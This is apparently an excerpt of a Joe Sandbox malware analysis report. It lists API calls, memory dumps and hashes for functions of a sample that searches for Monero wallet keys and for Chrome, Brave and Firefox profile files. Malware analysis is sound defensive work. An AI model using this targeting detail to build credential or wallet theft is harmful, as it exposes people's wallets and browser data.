                  • Opcode Fuzzy Hash: e90569f6889517c00f0735e35ab0e933a1904d9bd484107040bad44753a07e20
                  • Instruction Fuzzy Hash: 78E08670945348FBEB10ABE4DC0EB0876B8FB04B01F104144F708BA5D1CAB56641969A
                  Function 008710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008710B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008710F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: e4a00118e95958faf8950d84ffbcbfb81cc34257376e9e5d7c34298a7b0ebe96
                  • Instruction ID: 22b5a2f223497531d13e89015cdb401711a8fe6458d9592cdcb66080907de169
                  • Opcode Fuzzy Hash: e4a00118e95958faf8950d84ffbcbfb81cc34257376e9e5d7c34298a7b0ebe96
                  • Instruction Fuzzy Hash: 11F0E271641308BBEB14DAA8AC4DFAAB7ECE705B15F304548F508E3290D5719E40CAA1
                  Function 00871190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 008878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887910
                    • Part of subcall function 008878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00887917
                    • Part of subcall function 008878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0088792F
                    • Part of subcall function 00887850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008711B7), ref: 00887880
                    • Part of subcall function 00887850: RtlAllocateHeap.NTDLL(00000000), ref: 00887887
                    • Part of subcall function 00887850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0088789F
                  • ExitProcess.KERNEL32 ref: 008711C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 1f2c7f51946155851da027c21168fad603b6e28e926516540751a3b944207960
                  • Instruction ID: 0f989523357c709e75e3e5124ba7a52c948fa87ee86c4ab3e5794321aef3924c
                  • Opcode Fuzzy Hash: 1f2c7f51946155851da027c21168fad603b6e28e926516540751a3b944207960
                  • Instruction Fuzzy Hash: 84E0ECA5914202A2CA14B7F9AC4AB2A329CFB24345F541524FA09D6553FE25E901877B

                  Non-executed Functions

                  Function 008838B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 008838CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 008838E3
                  • lstrcat.KERNEL32(?,?), ref: 00883935
                  • StrCmpCA.SHLWAPI(?,00890F70), ref: 00883947
                  • StrCmpCA.SHLWAPI(?,00890F74), ref: 0088395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00883C67
                  • FindClose.KERNEL32(000000FF), ref: 00883C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 8e0aaf8d9ac51fbea54a26f599b5bbf2eef8a6c10e0c7e8e1f7233a3c9feb3e5
                  • Instruction ID: 19fd4858c61068afcbfc29ad3c8387cae4dcdd61a7e77cd3e304f6bce9d821dd
                  • Opcode Fuzzy Hash: 8e0aaf8d9ac51fbea54a26f599b5bbf2eef8a6c10e0c7e8e1f7233a3c9feb3e5
                  • Instruction Fuzzy Hash: 46A150B2A00218ABDB24EFA4DC85FEE7379FB54700F044688E50DD6191EB759B85CF62
                  Function 0087BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00890B32,00890B2B,00000000,?,?,?,008913F4,00890B2A), ref: 0087BEF5
                  • StrCmpCA.SHLWAPI(?,008913F8), ref: 0087BF4D
                  • StrCmpCA.SHLWAPI(?,008913FC), ref: 0087BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0087C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: b359cd8fa5c5bd06414340498d6b3e8a9ff131c81bfc432be0bc0068e1337f0e
                  • Instruction ID: 24406ed0716e7a46240d73b92e6d50909f5c6c94d92a85a14dafbfec36c09285
                  • Opcode Fuzzy Hash: b359cd8fa5c5bd06414340498d6b3e8a9ff131c81bfc432be0bc0068e1337f0e
                  • Instruction Fuzzy Hash: 7F4253729101049BDB18FBA8DD96EED7339FB54300F408569F50AD61D1EE38AB49CBA3
                  Function 00884910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0088492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00884943
                  • StrCmpCA.SHLWAPI(?,00890FDC), ref: 00884971
                  • StrCmpCA.SHLWAPI(?,00890FE0), ref: 00884987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00884B7D
                  • FindClose.KERNEL32(000000FF), ref: 00884B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: fbc12c7e1e5c2d27f39d24c31b9fce4d1974cf86af668a7e2ae10082b99c1d50
                  • Instruction ID: e835f51a657bcaa06778653c4766ddb5e24d115cf307b686ad4a03af636787ae
                  • Opcode Fuzzy Hash: fbc12c7e1e5c2d27f39d24c31b9fce4d1974cf86af668a7e2ae10082b99c1d50
                  • Instruction Fuzzy Hash: 866135B2900219ABCB24FBE4DC45EEA777CFB58700F048688E509D6151EF75DB858F91
                  Function 00884570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00884580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00884587
                  • wsprintfA.USER32 ref: 008845A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 008845BD
                  • StrCmpCA.SHLWAPI(?,00890FC4), ref: 008845EB
                  • StrCmpCA.SHLWAPI(?,00890FC8), ref: 00884601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0088468B
                  • FindClose.KERNEL32(000000FF), ref: 008846A0
                  • lstrcat.KERNEL32(?,015DE410), ref: 008846C5
                  • lstrcat.KERNEL32(?,015DD2B8), ref: 008846D8
                  • lstrlen.KERNEL32(?), ref: 008846E5
                  • lstrlen.KERNEL32(?), ref: 008846F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 2dfa6348e738e6452271861b96514fb84955896b6ce982650e07c53f9196e6ac
                  • Instruction ID: b9c4c8ae4616bb54d86d6bc7db62e771e08d9f046f068cf154053ca05be28b57
                  • Opcode Fuzzy Hash: 2dfa6348e738e6452271861b96514fb84955896b6ce982650e07c53f9196e6ac
                  • Instruction Fuzzy Hash: D45144B2540218ABCB24FBB4DC89FE9777CFB64700F404688B609D2191EF749B858F92
                  Function 00883EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00883EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00883EDA
                  • StrCmpCA.SHLWAPI(?,00890FAC), ref: 00883F08
                  • StrCmpCA.SHLWAPI(?,00890FB0), ref: 00883F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0088406C
                  • FindClose.KERNEL32(000000FF), ref: 00884081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 45da03d31fbd9c9692d18a2f7d6a4d5c016c127d329cd588e80879639926164c
                  • Instruction ID: ec3cf2189ea9cd98ab34e6b59b6fb9199988b315b7af033067827c594654df65
                  • Opcode Fuzzy Hash: 45da03d31fbd9c9692d18a2f7d6a4d5c016c127d329cd588e80879639926164c
                  • Instruction Fuzzy Hash: ED5148B2900218ABCB24FBF4DC45EEA737CFB54700F444688B659D6091EB75DB868F51
                  Function 0087ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0087ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0087ED55
                  • StrCmpCA.SHLWAPI(?,00891538), ref: 0087EDAB
                  • StrCmpCA.SHLWAPI(?,0089153C), ref: 0087EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0087F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: ea53eaecf22c8c28254f46b9da29bba57d86f5f9bfe68fef40e2eafc4a6a5c59
                  • Instruction ID: dd321644e495dd6ab137ed21b8a9d58d6e4b11b0081d53736884135c0d7dad6a
                  • Opcode Fuzzy Hash: ea53eaecf22c8c28254f46b9da29bba57d86f5f9bfe68fef40e2eafc4a6a5c59
                  • Instruction Fuzzy Hash: 69E1B1719111185AEB58FB64DD95AEE7338FF54300F4041EAB51AE20D2EE346B8ACF63
                  Function 0087F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008915B8,00890D96), ref: 0087F71E
                  • StrCmpCA.SHLWAPI(?,008915BC), ref: 0087F76F
                  • StrCmpCA.SHLWAPI(?,008915C0), ref: 0087F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0087FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 7cd0643749f5d16cf723104ba793dc6e91712d5b360109d5880ed4c422021fd7
                  • Instruction ID: 956096dda8c7f4d9473cc1960175862da185e7a080e1631ff83b7076cebc67da
                  • Opcode Fuzzy Hash: 7cd0643749f5d16cf723104ba793dc6e91712d5b360109d5880ed4c422021fd7
                  • Instruction Fuzzy Hash: 27B153719001189BDB28FF68DC95AED7379FF54300F4081A9E50AD6196EF34AB49CBA3
                  Function 008716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0089510C,?,?,?,008951B4,?,?,00000000,?,00000000), ref: 00871923
                  • StrCmpCA.SHLWAPI(?,0089525C), ref: 00871973
                  • StrCmpCA.SHLWAPI(?,00895304), ref: 00871989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00871D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00871DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00871E20
                  • FindClose.KERNEL32(000000FF), ref: 00871E32
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
